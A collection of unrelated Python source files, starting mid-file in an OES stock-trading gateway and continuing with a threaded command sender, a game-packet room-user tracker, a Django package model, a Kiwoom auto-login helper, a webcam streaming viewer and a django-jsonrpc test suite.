self.gateway.write_log(_("与交易服务器的连接已断开。"))
while self._alive and not self.reconnect():
pass
return
def on_order_rejected(self, d: OesRspMsgBodyT):
""""""
error_code = d.rptMsg.rptHead.ordRejReason
error_string = error_to_str(error_code)
data: OesOrdRejectT = d.rptMsg.rptBody.ordRejectRsp
if not data.origClSeqNo:
try:
i = self._order_manager.get_order(data.clSeqNo)
except KeyError:
return # rejected order created by others, don't need to care.
vt_order = i.vt_order
if vt_order == Status.ALLTRADED:
return
vt_order.status = Status.REJECTED
self.gateway.on_order(copy(vt_order))
self.gateway.write_log(
f"Order: {vt_order.vt_symbol}-{vt_order.vt_orderid} Code: {error_code} Rejected: {error_string}")
else:
self.gateway.write_log(f"撤单失败,订单号: {data.origClSeqNo}。原因:{error_string}")
def on_order_inserted(self, d: OesRspMsgBodyT):
""""""
data = d.rptMsg.rptBody.ordInsertRsp
vt_order = self._order_manager.oes_order_to_vt(data)
self.gateway.on_order(copy(vt_order))
def on_order_report(self, d: OesRspMsgBodyT):
""""""
data: OesOrdCnfmT = d.rptMsg.rptBody.ordCnfm
vt_order = self._order_manager.oes_order_to_vt(data)
self.gateway.on_order(copy(vt_order))
def on_trade_report(self, d: OesRspMsgBodyT):
""""""
data: OesTrdCnfmT = d.rptMsg.rptBody.trdCnfm
i = self._order_manager.get_order(data.clSeqNo)
vt_order = i.vt_order
trade = TradeData(
gateway_name=self.gateway.gateway_name,
symbol=data.securityId,
exchange=EXCHANGE_OES2VT[data.mktId],
orderid=str(data.clSeqNo),
tradeid=str(data.exchTrdNum),
direction=vt_order.direction,
offset=vt_order.offset,
price=data.trdPrice / 10000,
volume=data.trdQty,
time=parse_oes_datetime(data.trdDate, data.trdTime).isoformat()
)
vt_order.status = STATUS_OES2VT[data.ordStatus]
vt_order.traded = data.cumQty
vt_order.time = parse_oes_datetime(data.trdDate, data.trdTime)
self.gateway.on_trade(trade)
self.gateway.on_order(copy(vt_order))
def on_option_holding(self, d: OesRspMsgBodyT):
""""""
pass
def on_stock_holding(self, d: OesRspMsgBodyT):
""""""
data = d.rptMsg.rptBody.stkHoldingRpt
position = PositionData(
gateway_name=self.gateway.gateway_name,
symbol=data.securityId,
exchange=EXCHANGE_OES2VT[data.mktId],
direction=Direction.NET,
volume=data.sumHld,
frozen=data.lockHld,
price=data.costPrice / 10000,
# pnl=data.costPrice - data.originalCostAmt,
pnl=0,
yd_volume=data.originalHld,
)
self.gateway.on_position(position)
def on_cash(self, d: OesRspMsgBodyT):
""""""
data = d.rptMsg.rptBody.cashAssetRpt
balance = data.currentTotalBal
availiable = data.currentAvailableBal
# drawable = data.currentDrawableBal
account_id = data.cashAcctId
account = AccountData(
gateway_name=self.gateway.gateway_name,
accountid=account_id,
balance=balance,
frozen=balance - availiable,
)
self.gateway.on_account(account)
return 1
class OesTdApi:
def __init__(self, gateway: BaseGateway):
""""""
self.config_path: str = ''
self.ord_server: str = ''
self.qry_server: str = ''
self.rpt_server: str = ''
self.username: str = ''
self.password: str = ''
self.hdd_serial: str = ''
self.gateway = gateway
self._env = OesApiClientEnvT()
self._order_manager: "OrderManager" = OrderManager(self.gateway.gateway_name)
self._message_loop = OesTdMessageLoop(gateway,
self._env,
self,
self._order_manager
)
self._last_seq_lock = Lock()
self._last_seq_index = 1000000 # 0 has special manning for oes
self._ord_reconnect_lock = Lock()
def connect(self):
"""Connect to trading server.
:note set config_path before calling this function
"""
OesApi_InitLogger(self.config_path, 'log')
OesApi_SetCustomizedDriverId(self.hdd_serial)
if not self._connect_ord_channel():
self.gateway.write_log(_("无法初始化交易下单通道(td_ord_server)"))
if not self._connect_qry_channel():
self.gateway.write_log(_("无法初始化交易查询通道(td_qry_server)"))
if not self.connect_rpt_channel():
self.gateway.write_log(_("无法初始化交易查询通道(td_qry_server)"))
return True
def start(self):
""""""
self._message_loop.start()
def stop(self):
""""""
self._message_loop.stop()
OesApi_LogoutAll(self._env, True)
OesApi_DestoryAll(self._env)
def join(self):
""""""
self._message_loop.join()
def _get_new_seq_index(self):
""""""
with self._last_seq_lock:
index = self._last_seq_index
self._last_seq_index += 1
return index
def _connect_qry_channel(self):
OesApi_SetThreadUsername(self.username)
OesApi_SetThreadPassword(self.password)
return OesApi_InitQryChannel2(self._env.qryChannel,
create_remote_config(self.qry_server,
self.username,
self.password))
def _connect_ord_channel(self):
OesApi_SetThreadUsername(self.username)
OesApi_SetThreadPassword(self.password)
if not OesApi_InitOrdChannel2(self._env.ordChannel,
create_remote_config(self.ord_server,
self.username,
self.password),
0):
return False
self._last_seq_index = max(self._last_seq_index, self._env.ordChannel.lastOutMsgSeq + 1)
return True
def connect_rpt_channel(self):
OesApi_SetThreadUsername(self.username)
OesApi_SetThreadPassword(self.password)
subscribe_info = OesApiSubscribeInfoT()
subscribe_info.clEnvId = 0
subscribe_info.rptTypes = (eOesSubscribeReportTypeT.OES_SUB_RPT_TYPE_BUSINESS_REJECT
| eOesSubscribeReportTypeT.OES_SUB_RPT_TYPE_ORDER_INSERT
| eOesSubscribeReportTypeT.OES_SUB_RPT_TYPE_ORDER_REPORT
| eOesSubscribeReportTypeT.OES_SUB_RPT_TYPE_TRADE_REPORT
| eOesSubscribeReportTypeT.OES_SUB_RPT_TYPE_FUND_TRSF_REPORT
| eOesSubscribeReportTypeT.OES_SUB_RPT_TYPE_CASH_ASSET_VARIATION
| eOesSubscribeReportTypeT.OES_SUB_RPT_TYPE_HOLDING_VARIATION
)
return OesApi_InitRptChannel2(self._env.rptChannel,
create_remote_config(self.rpt_server,
self.username,
self.password),
subscribe_info,
0)
def _reconnect_ord_channel(self):
with self._ord_reconnect_lock: # prevent spawning multiple reconnect thread
self.gateway.write_log(_("正在重新连接到交易下单通道"))
while not self._connect_ord_channel():
time.sleep(1)
self.gateway.write_log(_("成功重新连接到交易下单通道"))
def _schedule_reconnect_ord_channel(self):
Thread(target=self._reconnect_ord_channel, ).start()
def query_account(self):
""""""
OesApi_QueryCashAsset(self._env.qryChannel,
OesQryCashAssetFilterT(),
self.on_query_asset
)
def on_query_asset(self,
session_info: SGeneralClientChannelT,
head: SMsgHeadT,
body: Any,
cursor: OesQryCursorT,
):
""""""
data = cast.toOesCashAssetItemT(body)
balance = data.currentTotalBal / 10000
availiable = data.currentAvailableBal / 10000
# drawable = data.currentDrawableBal
account_id = data.cashAcctId
account = AccountData(
gateway_name=self.gateway.gateway_name,
accountid=account_id,
balance=balance,
frozen=balance - availiable,
)
self.gateway.on_account(account)
return 1
def query_stock(self, ) -> bool:
""""""
f = OesQryStockFilterT()
ret = OesApi_QueryStock(self._env.qryChannel, f, self.on_query_stock)
return ret >= 0
def on_query_stock(self,
session_info: SGeneralClientChannelT,
head: SMsgHeadT,
body: Any,
cursor: OesQryCursorT,
):
""""""
data: OesStockBaseInfoT = cast.toOesStockItemT(body)
contract = ContractData(
gateway_name=self.gateway.gateway_name,
symbol=data.securityId,
exchange=EXCHANGE_OES2VT[data.mktId],
name=data.securityName,
product=PRODUCT_OES2VT[data.mktId],
size=data.buyQtyUnit,
min_volume=100,
net_position=True,
pricetick=data.priceUnit,
)
self.gateway.on_contract(contract)
return 1
def query_option(self) -> bool:
""""""
f = OesQryOptionFilterT()
ret = OesApi_QueryOption(self._env.qryChannel,
f,
self.on_query_option
)
return ret >= 0
def on_query_option(self,
session_info: SGeneralClientChannelT,
head: SMsgHeadT,
body: Any,
cursor: OesQryCursorT,
):
""""""
data = cast.toOesOptionItemT(body)
contract = ContractData(
gateway_name=self.gateway.gateway_name,
symbol=data.securityId,
exchange=EXCHANGE_OES2VT[data.mktId],
name=data.securityName,
product=PRODUCT_OES2VT[data.mktId],
size=data.roundLot,
pricetick=data.tickSize,
)
self.gateway.on_contract(contract)
return 1
def query_stock_holding(self) -> bool:
""""""
f = OesQryStkHoldingFilterT()
ret = OesApi_QueryStkHolding(self._env.qryChannel,
f,
self.on_query_stock_holding
)
return ret >= 0
def on_query_stock_holding(self,
session_info: SGeneralClientChannelT,
head: SMsgHeadT,
body: Any,
cursor: OesQryCursorT,
):
""""""
data = cast.toOesStkHoldingItemT(body)
position = PositionData(
gateway_name=self.gateway.gateway_name,
symbol=data.securityId,
exchange=EXCHANGE_OES2VT[data.mktId],
direction=Direction.NET,
volume=data.sumHld,
frozen=data.lockHld,
price=data.costPrice / 10000,
# pnl=data.costPrice - data.originalCostAmt,
pnl=0,
yd_volume=data.originalHld,
)
self.gateway.on_position(position)
return 1
def query_option_holding(self) -> bool:
""""""
f = OesQryStkHoldingFilterT()
f.mktId = eOesMarketIdT.OES_MKT_ID_UNDEFINE
ret = OesApi_QueryOptHolding(self._env.qryChannel,
f,
self.on_query_holding
)
return ret >= 0
def on_query_holding(self,
session_info: SGeneralClientChannelT,
head: SMsgHeadT,
body: Any,
cursor: OesQryCursorT,
):
""""""
data = cast.toOesOptHoldingItemT(body)
# 权利
pos_long = PositionData(
gateway_name=self.gateway.gateway_name,
symbol=data.securityId,
exchange=EXCHANGE_OES2VT[data.mktId],
direction=Direction.LONG,
volume=data.hldA,
frozen=data.hldRA,
price=0,
# pnl=data.costPrice - data.originalCostAmt,
pnl=0,
yd_volume=0,
)
self.gateway.on_position(pos_long)
# 义务
pos_short = PositionData(
gateway_name=self.gateway.gateway_name,
symbol=data.securityId,
exchange=EXCHANGE_OES2VT[data.mktId],
direction=Direction.SHORT,
volume=data.hldB,
frozen=data.hldRB,
price=0,
# pnl=data.costPrice - data.originalCostAmt,
pnl=0,
yd_volume=0,
)
self.gateway.on_position(pos_short)
return 1
def query_contracts(self):
""""""
self.query_stock()
# self.query_option()
# self.query_issue()
def query_position(self):
""""""
self.query_stock_holding()
self.query_option_holding()
def send_order(self, vt_req: OrderRequest):
""""""
seq_id = self._get_new_seq_index()
order_id = seq_id
oes_req = OesOrdReqT()
oes_req.clSeqNo = seq_id
oes_req.mktId = EXCHANGE_VT2OES[vt_req.exchange]
oes_req.ordType = ORDER_TYPE_VT2OES[(vt_req.exchange, vt_req.type)]
oes_req.bsType = BUY_SELL_TYPE_VT2OES[(vt_req.exchange, vt_req.offset, vt_req.direction)]
oes_req.invAcctId = ""
oes_req.securityId = vt_req.symbol
oes_req.ordQty = int(vt_req.volume)
oes_req.ordPrice = int(vt_req.price * 10000)
oes_req.origClOrdId = order_id
order = vt_req.create_order_data(str(order_id), self.gateway.gateway_name)
order.direction = Direction.NET # fix direction into NET: stock only
self._order_manager.save_order(order_id, order)
ret = OesApi_SendOrderReq(self._env.ordChannel,
oes_req
)
if ret >= 0:
order.status = Status.SUBMITTING
else:
order.status = Status.REJECTED
self.gateway.write_log(_("下单失败")) # todo: can I stringify error?
if is_disconnected(ret):
self.gateway.write_log(_("下单时连接发现连接已断开,正在尝试重连"))
self._schedule_reconnect_ord_channel()
self.gateway.on_order(order)
return order.vt_orderid
def cancel_order(self, vt_req: CancelRequest):
""""""
seq_id = self._get_new_seq_index()
oes_req = OesOrdCancelReqT()
order_id = int(vt_req.orderid)
oes_req.mktId = EXCHANGE_VT2OES[vt_req.exchange]
oes_req.clSeqNo = seq_id
oes_req.origClSeqNo = order_id
oes_req.invAcctId = ""
oes_req.securityId = vt_req.symbol
ret = OesApi_SendOrderCancelReq(self._env.ordChannel,
oes_req)
if ret < 0:
self.gateway.write_log(_("撤单失败")) # todo: can I stringify error?
if is_disconnected(ret): # is here any other ret code indicating connection lost?
self.gateway.write_log(_("撤单时连接发现连接已断开,正在尝试重连"))
self._schedule_reconnect_ord_channel()
def query_order(self, internal_order: InternalOrder) -> bool:
""""""
f = OesQryOrdFilterT()
f.mktId = EXCHANGE_VT2OES[internal_order.vt_order.exchange]
f.clSeqNo = internal_order.order_id
ret = OesApi_QueryOrder(self._env.qryChannel,
f,
self.on_query_order
)
return ret >= 0
def on_query_order(self,
session_info: SGeneralClientChannelT,
head: SMsgHeadT,
body: Any,
cursor: OesQryCursorT):
""""""
data: OesOrdCnfmT = cast.toOesOrdItemT(body)
i = self._order_manager.get_order(data.clSeqNo)
vt_order = i.vt_order
vt_order.status = STATUS_OES2VT[data.ordStatus]
vt_order.volume = data.ordQty
vt_order.traded = data.cumQty
self.gateway.on_order(copy(vt_order))
return 1
def query_orders(self) -> bool:
""""""
f = OesQryOrdFilterT()
ret = OesApi_QueryOrder(self._env.qryChannel,
f,
self.on_query_orders
)
return ret >= 0
def on_query_orders(self,
session_info: SGeneralClientChannelT,
head: SMsgHeadT,
body: Any,
cursor: OesQryCursorT,
):
""""""
data: OesOrdCnfmT = cast.toOesOrdItemT(body)
vt_order = self._order_manager.oes_order_to_vt(data)
self.gateway.on_order(vt_order)
return 1
class OrderManager:
def __init__(self, gateway_name: str):
self._orders: Dict[int, InternalOrder] = {}
self.gateway_name = gateway_name
def oes_order_to_vt(self, data):
order_id = data.clSeqNo
if hasattr(data, "origClSeqNo") and data.origClSeqNo:
order_id = data.origClSeqNo
try:
i = self.get_order(order_id)
vt_order = i.vt_order
vt_order.status = STATUS_OES2VT[data.ordStatus]
vt_order.volume = data.ordQty
vt_order.traded = data.cumQty
vt_order.time = parse_oes_datetime(data.ordDate, data.ordTime).isoformat()
except KeyError:
if data.bsType == eOesBuySellTypeT.OES_BS_TYPE_BUY:
offset = Offset.OPEN
else:
offset = Offset.CLOSE
vt_order = OrderData(
gateway_name=self.gateway_name,
symbol=data.securityId,
exchange=EXCHANGE_OES2VT[data.mktId],
orderid=str(order_id if order_id else data.origClSeqNo), # generated id
type=ORDER_TYPE_OES2VT[(data.mktId, data.ordType)],
direction=Direction.NET,
offset=offset,
price=data.ordPrice / 10000,
volume=data.ordQty,
traded=data.cumQty,
status=STATUS_OES2VT[
data.ordStatus],
# this time should be generated automatically or by a static function
time=parse_oes_datetime(data.ordDate, data.ordCnfmTime).isoformat(),
)
self.save_order(order_id, vt_order)
return vt_order
def save_order(self, order_id: int, order: OrderData):
""""""
self._orders[order_id] = InternalOrder(
order_id=order_id,
vt_order=order,
)
def get_order(self, order_id: int):
""""""
return self._orders[order_id]
|
parallel_senders.py
|
import threading
import BB
class ParallelSender(object):
'''
Sends a command and waits for the answer in parallel to other thread's execution,
allowing other thread's to poll if the response have been received.
:param Command command: Command to be sent, must be an instance of class Command.
:param int timeout: (Default 300000) How much time (in miliseconds) to wait for response before trying again or aborting.
:param int attempts: (Default 1) How many attempts to send the command if no response is received after timeout.
If attempts is 0, it will keep trying indefinitely until StopSending is called. (Use carefully)
.. note::
Notice the command is sent when the object is created.
'''
def __init__(self, command, timeout = 300000, attempts = 1):
self._sendingLock = threading.Lock()
self._sending = True
self._respLock = threading.Lock()
self._response = None
self._command = command
self._attemptsLock = threading.Lock()
self._attempts = attempts
self._timeout = timeout/1000.0
self._p = threading.Thread(target=self._Execute)
self._p.daemon = True
self._p.start()
@property
def sending(self):
'''
A property that indicates whether the object is still waiting for a response.
'''
self._sendingLock.acquire()
r = self._sending
self._sendingLock.release()
return r
def _setSending(self, s):
self._sendingLock.acquire()
self._sending = s
self._sendingLock.release()
@property
def response(self):
'''
A property for retrieving the response object generated by the command.
This property should be used when *sending* is ``False``.
'''
if not self._respLock.acquire(False):
return None
r = self._response
self._respLock.release()
return r
def _setResponse(self, R):
self._respLock.acquire()
self._response = R
self._respLock.release()
def StopSending(self):
self._attemptsLock.acquire()
self._attempts = 1
self._attemptsLock.release()
def _Execute(self):
response = None
currentAttempt = 0
self._attemptsLock.acquire()
att = self._attempts
self._attemptsLock.release()
while not response and (att == 0 or currentAttempt < att):
currentAttempt += 1
response = BB.SendAndWait(self._command, self._timeout)
self._attemptsLock.acquire()
att = self._attempts
self._attemptsLock.release()
self._setResponse(response)
self._setSending(False)
|
hunitytools.py
|
import threading
from .gextension import Extension
from .hmessage import HMessage, Direction
from .hunityparsers import HUnityEntity, HUnityStatus
class UnityRoomUsers:
def __init__(self, ext: Extension, users_in_room=28, get_guest_room=385, user_logged_out=29, status=34):
self.room_users = {}
self.__callback_new_users = None
self.__ext = ext
self.__lock = threading.Lock()
ext.intercept(Direction.TO_CLIENT, self.__load_room_users, users_in_room)
ext.intercept(Direction.TO_SERVER, self.__clear_room_users, get_guest_room)
ext.intercept(Direction.TO_CLIENT, self.__remove_user, user_logged_out)
ext.intercept(Direction.TO_CLIENT, self.__on_status, status)
def __remove_user(self, message: HMessage):
self.__start_remove_user_processing_thread(message.packet.read_int())
def __start_remove_user_processing_thread(self, index: int):
thread = threading.Thread(target=self.__process_remove_user, args=(index,))
thread.start()
def __process_remove_user(self, index: int):
self.__lock.acquire()
try:
if index in self.room_users:
del self.room_users[index]
finally:
self.__lock.release()
def __load_room_users(self, message: HMessage):
users = HUnityEntity.parse(message.packet)
self.__start_user_processing_thread(users)
if self.__callback_new_users is not None:
self.__callback_new_users(users)
def __process_users_in_room(self, entities):
self.__lock.acquire()
try:
for user in entities:
print(f'Adding entity {user}')
self.room_users[user.index] = user
finally:
self.__lock.release()
def __start_user_processing_thread(self, entities):
thread = threading.Thread(target=self.__process_users_in_room, args=(entities,))
thread.start()
def __clear_room_users(self, _):
self.__lock.acquire()
self.room_users.clear()
self.__lock.release()
def on_new_users(self, func):
self.__callback_new_users = func
def __on_status(self, message):
thread = threading.Thread(target=self.__parse_and_apply_updates, args=(message.packet,))
thread.start()
def __parse_and_apply_updates(self, packet):
self.try_updates(HUnityStatus.parse(packet))
def __apply_updates(self, updates):
for update in updates:
self.__lock.acquire()
try:
user = self.room_users[update.index]
if isinstance(user, HUnityEntity):
user.try_update(update)
except KeyError:
pass
finally:
self.__lock.release()
def __start_update_processing_thread(self, updates):
thread = threading.Thread(target=self.__apply_updates, args=(updates,))
thread.start()
def try_updates(self, updates):
self.__start_update_processing_thread(updates)
|
package.py
|
import os
import threading
import uuid
import yaml
from django.db import models
from common.models import JsonTextField
from django.utils.translation import ugettext_lazy as _
from fit2ansible.settings import PACKAGE_DIR
from kubeops_api.package_manage import *
__all__ = ['Package']
class Package(models.Model):
id = models.UUIDField(default=uuid.uuid4, primary_key=True)
name = models.CharField(max_length=20, unique=True, verbose_name=_('Name'))
meta = JsonTextField(blank=True, null=True, verbose_name=_('Meta'))
date_created = models.DateTimeField(auto_now_add=True, verbose_name=_('Date created'))
packages_dir = PACKAGE_DIR
def __str__(self):
return self.name
class Meta:
verbose_name = _('Package')
@property
def path(self):
return os.path.join(self.packages_dir, self.name)
@property
def repo_port(self):
return self.meta['vars']['repo_port']
@property
def registry_port(self):
return self.meta['vars']['registry_port']
@classmethod
def lookup(cls):
for d in os.listdir(cls.packages_dir):
full_path = os.path.join(cls.packages_dir, d)
meta_path = os.path.join(full_path, 'meta.yml')
if not os.path.isdir(full_path) or not os.path.isfile(meta_path):
continue
with open(meta_path) as f:
metadata = yaml.load(f)
defaults = {'name': d, 'meta': metadata}
instance = cls.objects.update_or_create(defaults=defaults, name=d)[0]
thread = threading.Thread(target=cls.start_container(instance))
thread.start()
@classmethod
def start_container(cls, package):
if not is_package_container_exists(package.name):
create_package_container(package)
return
if not is_package_container_start(package.name):
start_package_container(package)
|
autologin1.py
|
import time
import pythoncom
from manuallogin import *
from PyQt5 import QtWidgets
from PyQt5.QtCore import QTimer
from multiprocessing import Process
from PyQt5.QAxContainer import QAxWidget
sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__))))
from utility.setting import openapi_path
class Window(QtWidgets.QMainWindow):
app = QtWidgets.QApplication(sys.argv)
def __init__(self):
super().__init__()
self.bool_connected = False
self.ocx = QAxWidget('KHOPENAPI.KHOpenAPICtrl.1')
self.ocx.OnEventConnect.connect(self.OnEventConnect)
self.CommConnect()
def CommConnect(self):
self.ocx.dynamicCall('CommConnect()')
while not self.bool_connected:
pythoncom.PumpWaitingMessages()
def OnEventConnect(self, err_code):
if err_code == 0:
self.bool_connected = True
self.AutoLoginOn()
def AutoLoginOn(self):
print('\n 자동 로그인 설정 대기 중 ...\n')
QTimer.singleShot(5000, lambda: auto_on(1))
self.ocx.dynamicCall('KOA_Functions(QString, QString)', 'ShowAccountWindow', '')
print(' 자동 로그인 설정 완료\n')
print(' 자동 로그인 설정용 프로세스 종료 중 ...')
if __name__ == '__main__':
login_info = f'{openapi_path}/system/Autologin.dat'
if os.path.isfile(login_info):
os.remove(f'{openapi_path}/system/Autologin.dat')
print('\n 자동 로그인 설정 파일 삭제 완료\n')
Process(target=Window).start()
print(' 자동 로그인 설정용 프로세스 시작\n')
while find_window('Open API login') == 0:
print(' 로그인창 열림 대기 중 ...\n')
time.sleep(1)
print(' 아이디 및 패스워드 입력 대기 중 ...\n')
time.sleep(5)
manual_login(2)
print(' 아이디 및 패스워드 입력 완료\n')
|
live_stream_app.py
|
import cv2
import os
import sys
from time import time
from datetime import datetime
import argparse
from imutils.video import FPS
import utils
from threading import Thread
from queue import Queue
def live_stream(cam_id):
""" """
# cam = utils.WebCam(cam_id, 'Live Streaming')
cam = utils.IPCam('https://www.youtube.com/watch?v=psfFJR3vZ78', 'Live Stream')
t_start = datetime.now()
fps = FPS().start()
while True:
if utils.Esc_key_pressed(): break
frame = cam.get_frame()
fps.update()
if frame is None: break
cv2.imshow(cam.name, frame)
fps.stop()
print("Elapsed = {:.2f}".format(fps.elapsed()))
print("FPS = {:.2f}".format(fps.fps()))
cam.close()
class LiveStreamer(object):
"""
"""
def __init__(self, cam_id):
self.cam = utils.WebCam(cam_id, 'Live Stream')
self.fps = FPS().start()
self.in_q = Queue()
self.out_q = Queue()
self.stopped = False
self.threads = []
def start(self):
th = Thread(target=self.frame_preprocess)
th.start()
self.threads.append(th)
th = Thread(target=self.frame_process)
th.start()
self.threads.append(th)
th = Thread(target=self.stream)
th.start()
self.threads.append(th)
def frame_preprocess(self):
while True:
if self.stopped is True: break
frame = self.cam.get_frame()
self.in_q.put(frame)
if frame is None: break
self.stopped = True
def frame_process(self):
while True:
if self.stopped is True: break
frame = self.in_q.get()
if frame is None: break
self.fps.update()
self.out_q.put(frame)
self.in_q.task_done()
self.stopped = True
def stream(self):
while True:
frame = self.out_q.get()
if frame is None: break
cv2.imshow(self.cam.name, frame)
self.out_q.task_done()
self.stopped = True
def stop(self):
self.stopped = True
self.in_q.put(None)
self.out_q.put(None)
for th in self.threads:
th.join()
self.fps.stop()
print("Elapsed = {:.2f} sec".format(self.fps.elapsed()))
print("Frame Rate = {:.2f} fps".format(self.fps.fps()))
self.cam.close()
def start_live_stream(cam_id):
""" """
streamer = LiveStreamer(cam_id)
streamer.start()
while True:
if utils.Esc_key_pressed():break
if streamer.stopped == True: break
streamer.stop()
def main():
""" script entry point """
parser = argparse.ArgumentParser()
parser.add_argument('-v', '--video', type=str, default='')
args = vars(parser.parse_args())
if args['video']:
video = args['video']
else:
video = 0
live_stream(video)
# start_live_stream(video)
if __name__ == '__main__':
main()
|
test.py
|
import os
import sys
import unittest
import time
import urllib
import threading
import six
from six.moves.urllib import request as urllib_request
from six.moves.urllib import parse as urllib_parse
sys.path.insert(0, os.path.join(os.path.dirname(os.path.abspath(__file__)), '..'))
TEST_DEFAULTS = {
'ROOT_URLCONF': 'jsontesturls',
'DEBUG': True,
'DEBUG_PROPAGATE_EXCEPTIONS': True,
'DATETIME_FORMAT': 'N j, Y, P',
'USE_I18N': False,
'INSTALLED_APPS': (
'jsonrpc',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions'),
'DATABASES': {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': 'test.sqlite3',
},
},
'MIDDLEWARE_CLASSES': (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
),
'AUTHENTICATION_BACKENDS': ('django.contrib.auth.backends.ModelBackend',),
'TEMPLATE_LOADERS': (
'django.template.loaders.filesystem.load_template_source',
'django.template.loaders.app_directories.load_template_source'),
}
from django.conf import settings
settings.configure(**TEST_DEFAULTS)
import django
if hasattr(django, 'setup'):
# Run django.setup() for Django>=1.7
django.setup()
from django.core import management
from django.test import Client
from django.contrib.auth.models import User
from jsonrpc import jsonrpc_method, _parse_sig, Any
from jsonrpc.proxy import ServiceProxy, TestingServiceProxy
from jsonrpc._json import loads, dumps
from jsonrpc.site import validate_params
from jsonrpc.exceptions import *
from jsonrpc._types import *
try:
from collections import OrderedDict
except ImportError:
# Use SortedDict instead of OrderedDict for python < 2.7
# Can be removed when support for Django < 1.7 is dropped
# https://docs.djangoproject.com/en/1.7/releases/1.7/#django-utils-datastructures-sorteddict
from django.utils.datastructures import SortedDict as OrderedDict
def _call(host, req):
return loads(urllib_request.urlopen(host, dumps(req).encode('utf-8')).read().decode('utf-8'))
def start_json_server_thread():
class JSONServer(object):
def _thread_body(self):
try:
from wsgiref.simple_server import make_server
from django.core.handlers.wsgi import WSGIHandler
import django
ver = django.VERSION[:2]
if ver >= (1, 7):
django.setup() # populate app registry for django >= 1.8
if ver <= (1, 7):
management.call_command('syncdb', interactive=False)
else:
management.call_command('migrate', interactive=False)
try:
User.objects.create_user(username='sammeh', email='sam@rf.com', password='password').save()
except:
pass
http = make_server('', 8999, WSGIHandler())
print('Server made. continue={0}'.format(self.continue_serving))
self.event.set() # notify parent thread that the server is ready to serve requests
while self.continue_serving:
print('Waiting for request!')
http.handle_request()
self.n_requests += 1
print('Handled {0} requests!'.format(self.n_requests))
print('Got server stop! requests={0}'.format(self.n_requests))
http.server_close()
print('Server closed!')
except Exception as e:
import traceback
traceback.print_exc()
print('Error startign server: {0}'.format(e))
finally:
if not self.event.is_set():
self.event.set()
def start(self):
print('Got server start')
self.continue_serving = True
self.n_requests = 0
self.event = threading.Event()
self.t = threading.Thread(target=self._thread_body)
self.t.start()
self.event.wait()
return self
def stop(self):
print('Got stop call')
self.continue_serving = False
try:
proxy = ServiceProxy('http://127.0.0.1:8999/json/', version=2.0)
proxy.jsonrpc.test(string='Hello')['result']
except: # doesnt matter if this fails
pass
self.t.join(2.0)
return self
return JSONServer().start()
class JSONServerTestCase(unittest.TestCase):
def setUp(self):
self.host = 'http://127.0.0.1:8999/json/'
@jsonrpc_method('jsonrpc.test')
def echo(request, string):
"""Returns whatever you give it."""
return string
@jsonrpc_method('jsonrpc.testAuth', authenticated=True)
def echoAuth(requet, string):
return string
@jsonrpc_method('jsonrpc.notify')
def notify(request, string):
pass
@jsonrpc_method('jsonrpc.fails')
def fails(request, string):
raise IndexError
@jsonrpc_method('jsonrpc.strangeEcho')
def strangeEcho(request, string, omg, wtf, nowai, yeswai='Default'):
return [string, omg, wtf, nowai, yeswai]
@jsonrpc_method('jsonrpc.safeEcho', safe=True)
def safeEcho(request, string):
return string
@jsonrpc_method('jsonrpc.strangeSafeEcho', safe=True)
def strangeSafeEcho(request, *args, **kwargs):
return strangeEcho(request, *args, **kwargs)
@jsonrpc_method('jsonrpc.checkedEcho(string=str, string2=str) -> str', safe=True, validate=True)
def protectedEcho(request, string, string2):
return string + string2
@jsonrpc_method('jsonrpc.checkedArgsEcho(string=str, string2=str)', validate=True)
def protectedArgsEcho(request, string, string2):
return string + string2
@jsonrpc_method('jsonrpc.checkedReturnEcho() -> String', validate=True)
def protectedReturnEcho(request, string, string2):
return string + string2
@jsonrpc_method('jsonrpc.authCheckedEcho(Object, Array) -> Object', validate=True)
def authCheckedEcho(request, obj1, arr1):
return {'obj1': obj1, 'arr1': arr1}
@jsonrpc_method('jsonrpc.varArgs(String, String, str3=String) -> Array', validate=True)
def checkedVarArgsEcho(request, *args, **kw):
return list(args) + list(kw.values())
class JSONRPCFunctionalTests(unittest.TestCase):
def test_method_parser(self):
working_sigs = [
('jsonrpc', 'jsonrpc', OrderedDict(), Any),
('jsonrpc.methodName', 'jsonrpc.methodName', OrderedDict(), Any),
('jsonrpc.methodName() -> list', 'jsonrpc.methodName', OrderedDict(), list),
('jsonrpc.methodName(str, str, str ) ', 'jsonrpc.methodName', OrderedDict([('a', str), ('b', str), ('c', str)]), Any),
('jsonrpc.methodName(str, b=str, c=str)', 'jsonrpc.methodName', OrderedDict([('a', str), ('b', str), ('c', str)]), Any),
('jsonrpc.methodName(str, b=str) -> dict', 'jsonrpc.methodName', OrderedDict([('a', str), ('b', str)]), dict),
('jsonrpc.methodName(str, str, c=Any) -> Any', 'jsonrpc.methodName', OrderedDict([('a', str), ('b', str), ('c', Any)]), Any),
('jsonrpc(Any ) -> Any', 'jsonrpc', OrderedDict([('a', Any)]), Any),
]
error_sigs = [
('jsonrpc(str) -> nowai', ValueError),
('jsonrpc(nowai) -> Any', ValueError),
('jsonrpc(nowai=str, str)', ValueError),
('jsonrpc.methodName(nowai*str) -> Any', ValueError)
]
for sig in working_sigs:
ret = _parse_sig(sig[0], list(iter(sig[2])))
self.assertEquals(ret[0], sig[1])
self.assertEquals(ret[1], sig[2])
self.assertEquals(ret[2], sig[3])
for sig in error_sigs:
e = None
try:
_parse_sig(sig[0], ['a'])
except Exception as exc:
e = exc
self.assert_(type(e) is sig[1])
def test_validate_args(self):
sig = 'jsonrpc(String, String) -> String'
M = jsonrpc_method(sig, validate=True)(lambda r, s1, s2: s1+s2)
self.assert_(validate_params(M, {'params': ['omg', 'wtf']}) is None)
E = None
try:
validate_params(M, {'params': [['omg'], ['wtf']]})
except Exception as e:
E = e
self.assert_(type(E) is InvalidParamsError)
def test_validate_args_any(self):
sig = 'jsonrpc(s1=Any, s2=Any)'
M = jsonrpc_method(sig, validate=True)(lambda r, s1, s2: s1+s2)
self.assert_(validate_params(M, {'params': ['omg', 'wtf']}) is None)
self.assert_(validate_params(M, {'params': [['omg'], ['wtf']]}) is None)
self.assert_(validate_params(M, {'params': {'s1': 'omg', 's2': 'wtf'}}) is None)
def test_types(self):
if six.PY2:
assert type(unicode('')) == String
assert type('') == String
assert not type('') == Object
